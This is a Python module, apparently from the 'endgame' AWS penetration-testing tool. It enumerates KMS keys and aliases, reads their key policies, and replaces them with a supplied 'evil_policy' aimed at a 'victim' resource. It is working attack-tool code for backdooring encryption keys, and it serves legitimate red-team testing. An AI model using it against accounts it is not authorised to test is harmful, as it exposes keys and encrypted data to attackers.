156 lines
7.6 KiB
Python
156 lines
7.6 KiB
Python
import logging
|
|
import json
|
|
import boto3
|
|
import botocore
|
|
from abc import ABC
|
|
from botocore.exceptions import ClientError
|
|
from policy_sentry.util.arns import get_account_from_arn, get_resource_path_from_arn
|
|
from endgame.shared import constants
|
|
from endgame.exposure_via_resource_policies.common import ResourceType, ResourceTypes
|
|
from endgame.shared.policy_document import PolicyDocument
|
|
from endgame.shared.list_resources_response import ListResourcesResponse
|
|
from endgame.shared.response_message import ResponseMessage
|
|
from endgame.shared.response_message import ResponseGetRbp
|
|
|
|
logger = logging.getLogger(__name__)
|
|
|
|
|
|
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/kms.html
|
|
class KmsKey(ResourceType, ABC):
|
|
def __init__(self, name: str, region: str, client: boto3.Session.client, current_account_id: str):
|
|
self.service = "kms"
|
|
self.resource_type = "key"
|
|
self.region = region
|
|
self.current_account_id = current_account_id
|
|
if name.startswith("alias"):
|
|
self.alias = name
|
|
name = self._get_key_id_with_alias(name, client)
|
|
self.name = name
|
|
else:
|
|
self.name = name
|
|
self.alias = None
|
|
self.override_resource_block = self.arn
|
|
super().__init__(name, self.resource_type, self.service, region, client, current_account_id,
|
|
override_resource_block=self.override_resource_block)
|
|
|
|
@property
|
|
def arn(self) -> str:
|
|
return f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{self.name}"
|
|
|
|
def _get_key_id_with_alias(self, name: str, client: boto3.Session.client) -> str:
|
|
"""Given an alias, return the key ID"""
|
|
response = client.describe_key(KeyId=name)
|
|
key_id = response.get("KeyMetadata").get("KeyId")
|
|
return key_id
|
|
|
|
def _get_rbp(self) -> ResponseGetRbp:
|
|
"""Get the resource based policy for this resource and store it"""
|
|
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/kms.html#KMS.Client.get_key_policy
|
|
logger.debug("Getting resource policy for %s" % self.arn)
|
|
try:
|
|
response = self.client.get_key_policy(KeyId=self.arn, PolicyName="default")
|
|
if response.get("Policy"):
|
|
policy = constants.get_empty_policy()
|
|
policy["Statement"].extend(json.loads(response.get("Policy")).get("Statement"))
|
|
else:
|
|
policy = constants.get_empty_policy()
|
|
success = True
|
|
except botocore.exceptions.ClientError:
|
|
# When there is no policy, let's return an empty policy to avoid breaking things
|
|
policy = constants.get_empty_policy()
|
|
success = False
|
|
policy_document = PolicyDocument(
|
|
policy=policy,
|
|
service=self.service,
|
|
override_action=self.override_action,
|
|
include_resource_block=self.include_resource_block,
|
|
override_resource_block=self.override_resource_block,
|
|
override_account_id_instead_of_principal=self.override_account_id_instead_of_principal,
|
|
)
|
|
response = ResponseGetRbp(policy_document=policy_document, success=success)
|
|
return response
|
|
|
|
def set_rbp(self, evil_policy: dict) -> ResponseMessage:
|
|
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/kms.html#KMS.Client.put_key_policy
|
|
new_policy = json.dumps(evil_policy)
|
|
logger.debug("Setting resource policy for %s" % self.arn)
|
|
try:
|
|
self.client.put_key_policy(KeyId=self.name, PolicyName="default", Policy=new_policy)
|
|
message = "success"
|
|
success = True
|
|
except botocore.exceptions.ClientError as error:
|
|
message = str(error)
|
|
logger.critical(error)
|
|
success = False
|
|
response_message = ResponseMessage(message=message, operation="set_rbp", success=success, evil_principal="",
|
|
victim_resource_arn=self.arn, original_policy=self.original_policy,
|
|
updated_policy=evil_policy, resource_type=self.resource_type,
|
|
resource_name=self.name, service=self.service)
|
|
return response_message
|
|
|
|
|
|
class KmsKeys(ResourceTypes):
|
|
def __init__(self, client: boto3.Session.client, current_account_id: str, region: str):
|
|
super().__init__(client, current_account_id, region)
|
|
self.service = "kms"
|
|
self.resource_type = "key"
|
|
self.current_account_id = current_account_id
|
|
|
|
@property
|
|
def resources(self) -> [ListResourcesResponse]:
|
|
"""Get a list of these resources"""
|
|
|
|
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/kms.html#KMS.Paginator.ListKeys
|
|
def list_keys() -> list:
|
|
keys = []
|
|
paginator = self.client.get_paginator("list_keys")
|
|
page_iterator = paginator.paginate()
|
|
for page in page_iterator:
|
|
these_resources = page["Keys"]
|
|
for resource in these_resources:
|
|
key_id = resource.get("KeyId")
|
|
arn = resource.get("KeyArn")
|
|
keys.append(arn)
|
|
return keys
|
|
|
|
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/kms.html#KMS.Paginator.ListAliases
|
|
def filter_with_aliases(all_key_arns) -> list:
|
|
keys = []
|
|
key_arns_with_aliases = []
|
|
aws_managed_key_arns = []
|
|
paginator = self.client.get_paginator("list_aliases")
|
|
page_iterator = paginator.paginate()
|
|
for page in page_iterator:
|
|
these_resources = page["Aliases"]
|
|
for resource in these_resources:
|
|
alias = resource.get("AliasName")
|
|
key_id = resource.get("TargetKeyId")
|
|
arn = resource.get("AliasArn")
|
|
if alias.startswith("alias/aws") or alias.startswith("aws/"):
|
|
aws_managed_key_arns.append(arn)
|
|
if key_id:
|
|
aws_managed_key_arns.append(f"arn:aws:kms:{self.region}:{self.current_account_id}:key/{key_id}")
|
|
continue
|
|
else:
|
|
# keys.append(alias)
|
|
arn = f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{key_id}"
|
|
list_resources_response = ListResourcesResponse(
|
|
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
|
|
resource_type=self.resource_type, name=key_id, note=alias)
|
|
keys.append(list_resources_response)
|
|
key_arns_with_aliases.append(arn)
|
|
# If the key does not have an alias, return the key ID
|
|
for some_key_arn in all_key_arns:
|
|
if some_key_arn not in key_arns_with_aliases and some_key_arn not in aws_managed_key_arns:
|
|
key_id = get_resource_path_from_arn(some_key_arn)
|
|
arn = f"arn:aws:{self.service}:{self.region}:{self.current_account_id}:{self.resource_type}/{key_id}"
|
|
list_resources_response = ListResourcesResponse(
|
|
service=self.service, account_id=self.current_account_id, arn=arn, region=self.region,
|
|
resource_type=self.resource_type, name=key_id)
|
|
keys.append(list_resources_response)
|
|
return keys
|
|
key_ids = list_keys()
|
|
resources = filter_with_aliases(key_ids)
|
|
return resources
|
|
|